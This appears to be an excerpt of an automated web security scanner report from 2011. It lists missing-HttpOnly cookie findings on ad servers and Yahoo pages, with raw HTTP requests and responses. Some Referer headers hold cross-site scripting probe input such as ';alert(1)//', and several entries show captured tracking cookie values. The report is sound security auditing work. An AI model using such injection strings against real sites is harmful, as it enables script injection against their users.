Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 6172
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=45AC0400-CF32-A440-020A-0900001F0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKgy*39173:2|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKgyAKLp:2|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Fqr0:2|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GV2B:2|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|Fqr0GV2B:2|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

10.34. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/* HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313287862_68296079_as3105_imp|305#1315313287862_68296079_as3105_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:07 GMT
Content-Length: 2563

<!DOCTYPE html>
<!-- Impression Id: 1315313287862_68296079_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...

10.35. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1315313297486_68372787_as3103_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313297486_68372787_as3103_imp|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: act=a$305#1315313312306_68316035_as3106_clk!1315313297486_68372787_as3103_imp!|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:32 GMT; Path=/tase
Set-Cookie: imp=a$le#1315313312306_68316035_as3106_clk|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:32 GMT; Path=/tase
Location: http://ad.doubleclick.net/clk;233814261;57705890;k
Content-Length: 0
Date: Tue, 06 Sep 2011 12:48:32 GMT


10.36. http://ak1.abmr.net/is/www.burstnet.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.burstnet.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.burstnet.com?U=/enlightn/8117/3E06/&V=3-cwzEbZCyUni%2f8BpqAGOsC1A1e4rKZXfyTH1D5FeHizuf5PRgzsGOFg%3d%3d&I=F72DD362342178E&D=burstnet.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: 01AI=2-2-CEA75E37E6AD97051B199F5C65B08B1FDBBAFC21037372201F06A86726AC8F7B-D1B963138697FBA3A5D965FE009043982D2E891BE605625CC233FC7124123F41

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.burstnet.com/enlightn/8117/3E06/?01AD=3dkYMHVTzFhJCMGPi3NSiBcbGWNRR0UvEfUz4EkxlLyviMUraAANJXw&01RI=F72DD362342178E&01NA=
Expires: Tue, 06 Sep 2011 12:55:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close
Set-Cookie: 01AI=2-2-6E1EAF0179147B5D1D764362679C5E536EABA049D6323A5F5A0B520C95496E5D-C58C8B546BEE2EE1CDACBFEA5A790DA0813F5C3BFA7590E67B9304D8676098A0; expires=Wed, 05-Sep-2012 12:55:53 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.37. http://autos.yahoo.com/darla/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /darla/fc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=autos&f=96432900&l=LREC&en=utf-8&npv=1&rn=1315331140773&em=%7B%22site-attribute%22%3A%22content%3D%27autosch%3D%22%22%20content%3D%22All%20Cars%3B%22%27%22%7D&t_e=1&.intl=us HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDY6MTIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49dXRmLTgmYW1wO25wdj0xJmFtcDtybj0xMzE1MzMxMTQwNzczJmFtcDtlbT0lN0IlMjJzaXRlLWF0dHJpYnV0ZSUyMiUzQSUyMmNvbnRlbnQlM0QlMjdhdXRvc2NoJTNEJTIyJTIyJTIwY29udGVudCUzRCUyMkFsbCUyMENhcnMlM0IlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdLFsiMjAxMTA5MDZfMDU6NDY6MTAiLCJhdXRvcy55YWhvby5jb21cL2Zhdmljb24uaWNvOTFhZjYlMDAlMGQlMGFmNTRlZDVjNDEwMCJdLFsiMjAxMTA5MDZfMDU6NDY6MTAiLCJhdXRvcy55YWhvby5jb21cL2Zhdmljb24uaWNvOWEyNDklMjUwZCUyNTBhMTE1NGMwZDI4YmIiXSxbIjIwMTEwOTA2XzA1OjQ2OjEwIiwiYXV0b3MueWFob28uY29tXC9mYXZpY29uLmljbzI2ZDEyJTBkJTBhYjBjMjhjNzVkOGMiXSxbIjIwMTEwOTA2XzA1OjQ2OjEwIiwiYXV0b3MueWFob28uY29tXC8yOTFmZiUwMCUwZCUwYWZjYzg4YThhOTU2Il1d&ver=1; expires=Wed, 07-Sep-2011 00:46:12 GMT; path=/; domain=autos.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 8095

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...

10.38. http://autos.yahoo.com/darla/md.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /darla/md.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /darla/md.php?en=utf-8 HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223; AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDU6NDAiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49dXRmLTgmYW1wO25wdj0xJmFtcDtybj0xMzE1MzMxMTQwNzczJmFtcDtlbT0lN0IlMjJzaXRlLWF0dHJpYnV0ZSUyMiUzQSUyMmNvbnRlbnQlM0QlMjdhdXRvc2NoJTNEJTIyJTIyJTIwY29udGVudCUzRCUyMkFsbCUyMENhcnMlM0IlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdXQ--&ver=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:17 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDY6MTciLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ2OjE3IiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MTQ4ODYzZjJlZGZkOTc0MjI4YmFlYzk3MyZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXSxbIjIwMTEwOTA2XzA1OjQ2OjE2IiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9NDg4NjNmMmUxNzVjNTFjYjFjZTg5YWQ3JmFtcDtybj0xMzE1MzMxMTQwNzczJmFtcDtlbT0lN0IlMjJzaXRlLWF0dHJpYnV0ZSUyMiUzQSUyMmNvbnRlbnQlM0QlMjdhdXRvc2NoJTNEJTIyJTIyJTIwY29udGVudCUzRCUyMkFsbCUyMENhcnMlM0IlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdLFsiMjAxMTA5MDZfMDU6NDY6MTYiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49dXRmLTg0ODg2M2YyZWM2MDg2MWJlOTk4MTA1MWEmYW1wO25wdj0xJmFtcDtybj0xMzE1MzMxMTQwNzczJmFtcDtlbT0lN0IlMjJzaXRlLWF0dHJpYnV0ZSUyMiUzQSUyMmNvbnRlbnQlM0QlMjdhdXRvc2NoJTNEJTIyJTIyJTIwY29udGVudCUzRCUyMkFsbCUyMENhcnMlM0IlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdLFsiMjAxMTA5MDZfMDU6NDY6MTUiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49NDg4NjNmMmU5MTJlNGNiZjBhNzEwZDU3JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; expires=Wed, 07-Sep-2011 00:46:17 GMT; path=/; domain=autos.yahoo.com
Cache-Control: private
Expires: Mon, 16 Nov 2020 00:00:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 1712


<html>
<head>
    <meta http-equiv="Cache-Control" content="public" />
    <meta http-equiv="Expires" content="Mon, 16 Nov 2020 00:00:01 GMT" />
    <meta http-equiv="Content-Type" content="text/html;
...[SNIP]...

10.39. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6135404&c3=9&c4=9844&c10=3186830&ns__t=1315331133850&ns_c=ISO-8859-1&c8=Click%20here%20to%20find%20out%20more!&c7=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D4%3Bsz%3D728x90%3Bord%3D8383746361359954%3F&c9=http%3A%2F%2Fgames.frontier.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 06 Sep 2011 12:45:33 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 12:45:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.40. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Set-Cookie: adxid=016e3b4e6615bdb5; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.41. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; BA=t=1315331123

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Tue Sep 6 12:45:35 UTC 2011 -->

10.42. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177
